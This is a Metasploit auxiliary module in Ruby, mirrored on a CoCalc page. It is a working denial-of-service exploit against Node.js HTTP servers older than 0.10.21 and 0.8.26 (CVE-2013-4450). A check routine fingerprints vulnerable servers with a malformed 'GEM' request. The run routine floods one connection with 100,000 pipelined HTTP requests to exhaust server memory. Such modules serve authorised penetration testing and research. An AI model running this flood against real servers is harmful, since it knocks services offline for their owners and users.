Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/nodejs_pipelining.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Node.js HTTP Pipelining Denial of Service',

15
        'Description' => %q{

16
          This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions

17
          released before 0.10.21 and 0.8.26. The attack sends many pipelined

18
          HTTP requests on a single connection, which causes unbounded memory

19
          allocation when the client does not read the responses.

20
        },

21
        'Author' => [

22
          'Marek Majkowski', # Vulnerability discovery

23
          'titanous',        # Metasploit module

24
          'joev'             # Metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2013-4450' ],

29
          [ 'OSVDB', '98724' ],

30
          [ 'BID', '63229' ],

31
          [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]

32
        ],

33
        'DisclosureDate' => '2013-10-18',

34
        'Notes' => {

35
          'Stability' => [CRASH_SERVICE_DOWN],

36
          'SideEffects' => [],

37
          'Reliability' => []

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        Opt::RPORT(80),

45
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])

46
      ]

47
    )

48
  end

49


50
  def check

51
    # http://blog.nodejs.org/2013/08/21/node-v0-10-17-stable/

52
    # check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted

53
    status = Exploit::CheckCode::Safe

54
    connect

55
    sock.put(http_request('GEM'))

56
    begin

57
      response = sock.get_once

58
      status = Exploit::CheckCode::Appears if response =~ /HTTP/

59
    rescue EOFError

60
      # checking against >= 0.10.17 raises EOFError because there is no

61
      # response to GEM requests

62
      vprint_error('Failed to determine the vulnerable state due to an EOFError (no response)')

63
      return Msf::Exploit::CheckCode::Unknown

64
    ensure

65
      disconnect

66
    end

67
    status

68
  end

69


70
  def host

71
    host = datastore['RHOST']

72
    host += ':' + datastore['RPORT'].to_s if datastore['RPORT'] != 80

73
    host

74
  end

75


76
  def http_request(method = 'GET')

77
    "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"

78
  end

79


80
  def run

81
    payload = http_request

82
    begin

83
      print_status('Stressing the target memory...')

84
      connect

85
      datastore['RLIMIT'].times { sock.put(payload) }

86
      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")

87
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

88
      print_status("Unable to connect to #{host}.")

89
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error

90
      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")

91
    ensure

92
      disconnect

93
    end

94
  end

95
end

96


97